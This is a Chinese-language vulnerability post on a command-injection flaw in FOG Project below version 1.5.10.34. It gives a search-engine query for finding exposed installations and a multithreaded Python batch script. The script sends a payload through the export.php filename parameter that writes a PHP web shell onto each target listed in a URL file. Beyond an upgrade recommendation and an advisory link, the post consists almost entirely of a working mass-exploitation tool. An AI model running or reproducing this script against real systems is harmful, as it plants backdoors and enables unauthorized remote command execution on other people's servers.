漏洞描述
FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名filename参数中。
漏洞影响
FOGPROJECT < 1.5.10.34 版本
搜索语句
鹰图平台:web.body="FOG Project"
批量脚本
import requests
import threading
class fog_poc:
def __init__(self, file_path):
file_path = file_path.replace('\"', '')
file_path = file_path.replace('\'', '')
with open(file_path, 'r') as f:
self.url_list = f.readlines()
def poc(self):
#构造poc
url_path = '/fog/management/export.php?filename=$(echo+\'<?php+echo+shell_exec($_GET["cmd"]);+?>\'+>+Ma1g3.php)&type=pdf'
header = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
data = 'fogguiuser=fog&nojson=2'
threads = []
def test_url(url):
url = url.replace('\n', '')
header['Host'] = url.split('//')[1]
url1 = url + url_path
try:
requests.packages.urllib3.disable_warnings()
response = requests.post(url1, data=data, headers=header, verify=False)
if 'Content-Disposition' in response.headers:
print(url + '存在此漏洞!!!')
with open('漏洞url.txt', 'a') as f:
f.write('\n' + url)
else:
print(url + '没有此漏洞')
except Exception as e:
print(e)
for url in self.url_list:
thread = threading.Thread(target=test_url, args=(url,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
if __name__ == '__main__':
file_path = input('请输入url文件路径:')
test = fog_poc(file_path)
test.poc()
示例
漏洞利用
修复建议
升级至安全版本
参考
https://github.com/FOGProject/fogproject/security/advisories/GHSA-7h44-6vq6-cq8j